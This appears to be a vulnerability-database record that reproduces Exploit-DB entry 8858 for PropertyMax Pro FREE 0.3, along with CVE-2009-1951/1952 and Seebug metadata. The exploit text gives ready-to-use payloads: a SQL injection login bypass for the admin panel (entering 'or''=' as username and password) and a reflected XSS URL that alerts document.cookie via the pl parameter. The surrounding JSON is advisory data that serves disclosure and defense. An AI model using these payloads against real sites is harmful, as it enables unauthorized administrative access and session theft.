propertymax pro free sql/XSS Multiple Vulnerabilities

{"bulletinFamily": "exploit", "id": "EDB-ID:8858", "cvelist": ["CVE-2009-1952", "CVE-2009-1951"], "modified": "2009-06-02T00:00:00", "lastseen": "2016-02-01T08:20:45", "edition": 1, "sourceData": "########################################################################\n[+] PropertyMax Pro FREE (SQL/XSS) Multiple Remote Vulnerabilities\n[+] Discovered By SirGod\n[+] www.mortal-team.org\n[+] www.h4cky0u.org\n#########################################################################\n\n[+] SQL Injection ( Auth Bypass) \n\nConditions : magic_quotes_gpc = off\n\nGo to :\n\n http://127.0.0.1/path/admin\n\nLogin as : \n\n Username : 'or''='\n Password : 'or''='\n\n[+] Cross-Site Scripting\n\n http://127.0.0.1/path/?op=mi&id=2&pl=\"><script>alert(document.cookie)</script>\n\n#########################################################################\n\n# milw0rm.com [2009-06-02]\n", "published": "2009-06-02T00:00:00", "href": "https://www.exploit-db.com/exploits/8858/", "osvdbidlist": ["54864", "54863"], "reporter": "SirGod", "hash": "fd2a94e7aae0e2a71b10ae78adf438860e18794259581af0df97a1cc7ca4b206", "title": "propertymax pro free sql/XSS Multiple Vulnerabilities", "history": [], "type": "exploitdb", "objectVersion": "1.0", "description": "PropertyMax Pro FREE (SQL/XSS) Multiple Remote Vulnerabilities. CVE-2009-1951,CVE-2009-1952. Webapps exploit for php platform", "references": [], "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/8858/", "enchantments": {"vulnersScore": 8.8}}

{"result": {"cve": [{"id": "CVE-2009-1952", "type": "cve", "title": "CVE-2009-1952", "description": "Multiple SQL injection vulnerabilities in the administrative login feature in PropertyMax Pro FREE 0.3, when magic_quotes_gpc is disabled, allow remote attackers to execute arbitrary SQL commands via the (1) username and (2) password parameters.", "published": "2009-06-05T17:30:00", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1952", "cvelist": ["CVE-2009-1952"], "lastseen": "2016-09-03T12:29:00"}, {"id": "CVE-2009-1951", "type": "cve", "title": "CVE-2009-1951", "description": "Cross-site scripting (XSS) vulnerability in index.php in PropertyMax Pro FREE 0.3 allows remote attackers to inject arbitrary web script or HTML via the pl parameter in a mi action.", "published": "2009-06-05T17:30:00", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1951", "cvelist": ["CVE-2009-1951"], "lastseen": "2016-09-03T12:28:58"}], "seebug": [{"id": "SSV-66595", "type": "seebug", "title": "propertymax pro free (sql/xss) Multiple Vulnerabilities", "description": "Summary: \nPropertyMax Pro FREE 0.3 version of the index. php cross-site scripting attack vulnerability. A remote attacker can use an mi operation in a pl parameters to inject arbitrary web script or HTML.\n", "published": "2014-07-01T00:00:00", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "href": "https://www.seebug.org/vuldb/ssvid-66595", "cvelist": ["CVE-2009-1951"], "lastseen": "2016-07-27T02:15:31"}]}}